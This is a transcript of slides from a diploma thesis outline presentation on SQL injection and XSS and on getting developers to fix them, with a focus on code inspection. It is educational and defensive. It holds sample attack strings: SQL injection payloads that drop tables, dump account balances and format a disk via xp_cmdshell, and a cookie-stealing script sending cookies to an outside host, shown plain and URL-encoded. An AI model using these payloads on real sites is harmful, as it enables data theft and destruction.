Whatever it takes - Fixing SQLIA and XSS in the process
-
Upload
guest3379bd -
Category
Technology
-
view
2.452 -
download
1
description
Transcript of Whatever it takes - Fixing SQLIA and XSS in the process
![Page 1: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/1.jpg)
Whatever it takesFixing SQLIA and XSS in the process
Diploma Thesis Outline Presentation, Florian Thiel
Seminar “Beiträge zum Software Engineering”, FU Berlin, 11/06/2008
![Page 3: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/3.jpg)
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
![Page 4: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/4.jpg)
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
![Page 5: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/5.jpg)
© by xckd: http://xkcd.com/327/
![Page 6: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/6.jpg)
© by xckd: http://xkcd.com/327/
![Page 7: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/7.jpg)
“SELECT firstname FROM Students WHERE (login = ‘%s’);” % login
© by xckd: http://xkcd.com/327/
![Page 8: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/8.jpg)
“SELECT firstname FROM Students WHERE (login = ‘%s’);” % login
SELECT firstname FROM Students WHERE (login = ‘Robert’); DROP TABLE Students; -- ‘);
© by xckd: http://xkcd.com/327/
![Page 9: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/9.jpg)
SQLIA threats
• data integrity
• confidentiality
• new attack vector
![Page 10: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/10.jpg)
“UPDATE Users SET password = ‘%s’ WHERE uid = ‘%s’;” % (pw, uid)
![Page 11: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/11.jpg)
UPDATE Users SET password = ‘password’ WHERE uid = ‘robert’ OR 1=1; --’;
Integrity
![Page 12: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/12.jpg)
“SELECT product FROM Products WHERE productid = ‘%s’;” % pid
![Page 13: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/13.jpg)
Confidentiality
SELECT product FROM Products WHERE productid = ‘0 UNION SELECT owner, balance FROM
Accounts; --’;
![Page 14: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/14.jpg)
“SELECT product, price FROM products WHERE category = ‘%s’;” % category
![Page 15: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/15.jpg)
SELECT product, price FROM products WHERE categoryid = exec
master..xp_cmdshell “format c:”-- ;
New Attack Vector
![Page 16: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/16.jpg)
Bad Mitigations
• PHP: addslashes()
• IDS blacklisting
• validation blacklisting
![Page 17: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/17.jpg)
Decent Mitigations
stmt = prepare(“SELECT name FROM Users WHERE uid = $1”)
db.execute(stmt, uid)
![Page 18: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/18.jpg)
Why it’s hard
Control Data
![Page 19: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/19.jpg)
More problems
• validation context != execution context
• really tolerant DBs
• “SEL”+”ECT”, anyone?
• DBs trying to fix illegal SQL
![Page 20: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/20.jpg)
Something different!?
http://searchsite/search?keyword=”<script>alert(‘you have been XSSed!’)</script>”
![Page 21: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/21.jpg)
Something different!?
http://searchsite/search?keyword=”<script>alert(‘you have been XSSed!’)</script>”
![Page 22: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/22.jpg)
“This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. “
-- Marc Slemko, Apache.org
![Page 23: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/23.jpg)
eval(‘user input’)1,2
1) the essence of XSS2) limited only by the execution environment
![Page 24: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/24.jpg)
XSS
• code injection
• popular in ECMAScript/Web2.0
![Page 25: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/25.jpg)
Got cookies?
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
![Page 26: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/26.jpg)
Got cookies?%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
![Page 28: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/28.jpg)
The Worm
![Page 29: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/29.jpg)
(Non-working) XSS Mitigations
• blacklisting of cribs
• blacklisting of characters
![Page 30: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/30.jpg)
helpful mitigations
• HTTPOnly cookies
• Whitelisting of characters
![Page 31: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/31.jpg)
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
![Page 32: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/32.jpg)
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
• have no “API”
![Page 33: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/33.jpg)
Failure to sanitize data into a different plane
![Page 34: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/34.jpg)
Safe Query Objects
• “real” SQL API
• adds static types
• dynamic queries still runtime evaluated
![Page 35: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/35.jpg)
AntiSamy
• Policy-based sanitation for HTML entities
• “Types” (by RegEx)
• (no semantics)
![Page 36: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/36.jpg)
Another job well done!
![Page 37: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/37.jpg)
GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1Host: msdn.microsoft.comUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-aCache-Control: max-age=0
![Page 38: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/38.jpg)
![Page 39: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/39.jpg)
Hmm, are we missing something
here?
![Page 40: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/40.jpg)
Absolutely!
![Page 41: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/41.jpg)
The interesting* part
* what my thesis is really about
![Page 42: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/42.jpg)
Make sure that the technical solutions are thoroughly applied
![Page 43: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/43.jpg)
1. Make developers use a reasonable architecture
2. Make developers recognize a weakness when they meet one
3. Make developers find weaknesses
4. Make people actually fix things
![Page 44: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/44.jpg)
1) (Architecture)
• centralization
• canonicalization
• have to be conservative
![Page 45: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/45.jpg)
2) (Recognition)
• patterns?
• flawed code examples in the wild
![Page 46: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/46.jpg)
3) (Detection)
• automated flow analysis
• code inspection
![Page 47: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/47.jpg)
Code inspection
• need a reading technique
• defect-based reading
![Page 48: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/48.jpg)
Artifacts
• reviewer annotates suspicious code regions
• e.g. @userinput, @output
• makes review work visible in the source code
• and more valuable since annotations can be reused
![Page 49: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/49.jpg)
// @userinput(data)// [insert data into query, ignore non-alphanums]def insertAlphaNum(query, data): // [make sure data is canonical] c_data = data.toCharSet(...) c_data.replace(...) ... // [insert data into query] query.prepare(...) query.insert(data...) ...
![Page 50: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/50.jpg)
4) (Repair)
• once weakness is known, developers should be motivated enough
• focus is on keeping the code secure, minimizing effort
![Page 51: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/51.jpg)
My tasks
• provide practical architectural assumptions
• construct effective reading method
• + awareness of potential weaknesses
• get a project to adopt my methods
![Page 52: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/52.jpg)
Questions?
![Page 53: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/53.jpg)
This presentation is licensed under a Creative Commons BY-SA license.
Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Attribution for pictures through links.
![Page 54: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/54.jpg)
Thank you!
![Page 55: Whatever it takes - Fixing SQLIA and XSS in the process](https://reader034.fdocuments.us/reader034/viewer/2022052620/557589dfd8b42ae7708b494a/html5/thumbnails/55.jpg)